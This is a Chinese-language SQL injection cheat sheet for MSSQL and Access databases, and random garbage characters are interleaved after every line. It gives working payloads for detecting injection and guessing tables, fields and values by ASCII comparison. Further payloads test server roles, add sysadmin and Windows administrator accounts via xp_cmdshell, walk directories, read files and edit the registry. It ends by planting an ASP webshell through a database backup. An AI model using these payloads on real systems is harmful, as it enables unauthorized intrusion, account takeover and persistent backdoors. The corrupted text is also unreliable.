1.判断是否有注入;and 1=1 ;and 1=2 ��k��`oXo%
2.初步判断是否是mssql ;and user>0 qgI
Jg6x/}
45kMIh~~�X
3.注入参数是字符'and [查询条件] and ''=' R3�?~+�y�&
aI8wy�-3�I
4.搜索时没过滤参数的'and [查询条件] and '%25'=' n���geX+@
?#�04�x70
5.判断数据库系统 .8b�����4�
P2`k�s[u+i
;and (select count(*) from sysobjects)>0 mssql �
%ef+��Z�
Mh~T.;f.qq
;and (select count(*) from msysobjects)>0 access }[LK/@h���
K�O)�<Zh�
`(Q58w�R}�
�hZ2PP� �^
6.猜数据库 ;and (select Count(*) from [数据库名])>0 7Mo���O2��
+Qld�Zb�a�
7.猜字段 ;and (select Count(字段名) from 数据库名)>0 �{�H])�Fob
PDD` eK}Fj
8.猜字段中记录长度 ;and (select top 1 len(字段名) from 数据库名)>0 pM�(y?zG�t
:\�4O9f*5+
9.(1)猜字段的ascii值(access) })mez[UmZ
}Z�VNDvGH�
;and (select top 1 asc(mid(字段名,1,1)) from 数据库名)>0 �/jj�@ �=H
Z�N1�Q�Tb�
(2)猜字段的ascii值(mssql) {GHGFi�`Z�
5Qy,P�kj�e
;and (select top 1 unicode(substring(字段名,1,1)) from 数据库名)>0 f�1=�8I_>=
u�U�c[�s"\
10.测试权限结构(mssql) XJ?�@l�3D:
�+Kf::[wP7
���}��E�cm
ARQ1�H0_B�
;and 1=(select IS_SRVROLEMEMBER('sysadmin'));-- QRdb~f;<hj
��n�8:2Z�>
;and 1=(select IS_SRVROLEMEMBER('serveradmin'));-- .-RW�lUe;,
q8k�t_&I�j
;and 1=(select IS_SRVROLEMEMBER('setupadmin'));-- "�hy#L
0\t
�cq�[}>5*k
;and 1=(select IS_SRVROLEMEMBER('securityadmin'));-- ��R`1�$z8$
cst��=m��s
;and 1=(select IS_SRVROLEMEMBER('diskadmin'));-- "K\��Rq+si
/�/wmJ�� |
;and 1=(select IS_SRVROLEMEMBER('bulkadmin'));-- �(�_nkscf�
,(c�="L4[�
;and 1=(select IS_MEMBER('db_owner'));-- !kV?h5@�Bo
�29av8eW?3
PY>j?�otD�
��3_33@�MM
11.添加mssql和系统的帐户 X�,y$!2�QI
c#Y9��L+O�
;exec master.dbo.sp_addlogin username;-- u��{H_q&1
;exec master.dbo.sp_password null,username,password;-- Pyy�x/u+?@
&�Q&$J )0
;exec master.dbo.sp_addsrvrolemember sysadmin username;-- )9<)mV*EB(
!�. 0W?6yo
;exec master.dbo.xp_cmdshell 'net user username password X(WG:�FP27
�9R� ugkGy
/workstations:*/times:all/passwordchg:yes /passwordreq:yes /active:yes /add';-- �Z>M*�!mQi
�q5HHM�HB
;exec master.dbo.xp_cmdshell 'net user username password /add';-- [Xz7.<0�#U
�Mm/GI���a
;exec master.dbo.xp_cmdshell 'net localgroup administrators username /add';-- 2l\Oufer�"
S:1! )�7
{ld��([���
.S5�&M��NE
12.(1)遍历目录 GbL,k�?�ey
_@^msyoq��
;create table dirs(paths varchar(100), id int) �jXW�71$B
bjvi`jyL3k
;insert dirs exec master.dbo.xp_dirtree 'c:\' wkIH<w|jb�
:�$}67b)MO
;and (select top 1 paths from dirs)>0 _FVI�N�;!�
]h|G�aHiE�
;and (select top 1 paths from dirs where paths not in('上步得到的paths'))>) =3(
�ZUV X
[n:��R]|^a
E3gQ`+wNg?
�wwp��vmb�
(2)遍历目录 Q0 �^�?j�h
pkx�W19h*0
;create table temp(id nvarchar(255),num1 nvarchar(255),num2 nvarchar(255),num3 nvarchar(255));-- #D>8\#53V/
;insert temp exec master.dbo.xp_availablemedia;-- 获得当前所有驱动器 90ORx\Oe�o
Wo2M��}]0�
;insert into temp(id) exec master.dbo.xp_subdirs 'c:\';-- 获得子目录列表 h�[lh01�z
�>�5 i8�%r
;insert into temp(id,num1) exec master.dbo.xp_dirtree 'c:\';-- 获得所有子目录的目录树构 �5�TnEC��k
#v~5f;[AAs
;insert into temp(id) exec master.dbo.xp_cmdshell 'type c:\web\index.asp';-- 查看文件的内容 �^T<<F}�@q
#K4wO!���d
6'Lij&,f?{
3gGF?��0o�
13.mssql中的存储过程 Fe�/*U4xU�
��IzL
y�n
xp_regenumvalues 注册表根键, 子键 TnKe"TA�|9
�Z#�Z�k)��
;exec xp_regenumvalues 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion\Run' 以多个记录集方式返回所有键值 zCco/]��h
Zd~Z`B�} &
xp_regread 根键,子键,键值名 M@gm�.)d��
�z�{%���G�
;exec xp_regread 4)"��jg[��
N*���$Q(K
'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion','CommonFilesDir' 返回制定键的值 �#cmj?y(�)
H�~$a6T"&
xp_regwrite 根键,子键, 值名, 值类型, 值 +�q���=/}|
)�D#*Q~���
值类型有2种REG_SZ 表示字符型,REG_DWORD 表示整型 YL{LdM-�xM
�'7E?|B0],
;exec xp_regwrite 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion','TestValueName','reg_sz','hello' 写入注册表 @,�s[�l�1P
|�9�(ui�Wf
xp_regdeletevalue 根键,子键,值名 c��5t?S@�b
"0]i4d�1�l
exec xp_regdeletevalue 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion','TestValueName' 删除某个值 V=
.'Db�2D
�W{0<ro��`
xp_regdeletekey 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion\Testkey' 删除键,包括该键下所有值 D vK}UAj�=
r<~1:/�F|
l$zM|Z1wR`
PVU(�R�J��
14.mssql的backup创建webshell g@S"!9[;U
�G���_�X'd
use model hx���:x5L>
^c-1w�V`�/
create table cmd(str image); �9 s>JdAw?
XLzH��m&;
insert into cmd(str) values (''); ~A�6Q�X�8a
0�_%u��(�?
backup database model to disk='c:\l.asp'; B�GUP�-_�&
Dpo�f~o,�f
T"�dEa-�O
^�Ji��5)c
15.mssql内置函数 ,c�7 8�O8|
Rr:,'c�XGi
;and (select @@version)>0 获得Windows的版本号 3�UBG?%!$f
& �}}o�9�
;and user_name()='dbo' 判断当前系统的连接用户是不是sa ��sYp@.?Tz
ya|7h��z�{
;and (select user_name())>0 爆当前系统的连接用户 ��C9�*'.�~
VV?KJz=,W=
;and (select db_name())>0 得到当前连接的数据库 *,z_�_S$Q)
%��pV/(/Q�
n*'�|7��#;
f4:g�D*Y�T
16.简洁的webshell /tV��)8pEj
zs7K :OlkA
use model K�72U�0}$B
4Kx;F
9!%~
create table cmd(str image); wLNO\J�P�'
!�v94F�kS>
insert into cmd(str) values (''); �b^FB[tZ\x
RELLQ�pz3�
backup database model to disk='g:\wwwtest\l.asp';
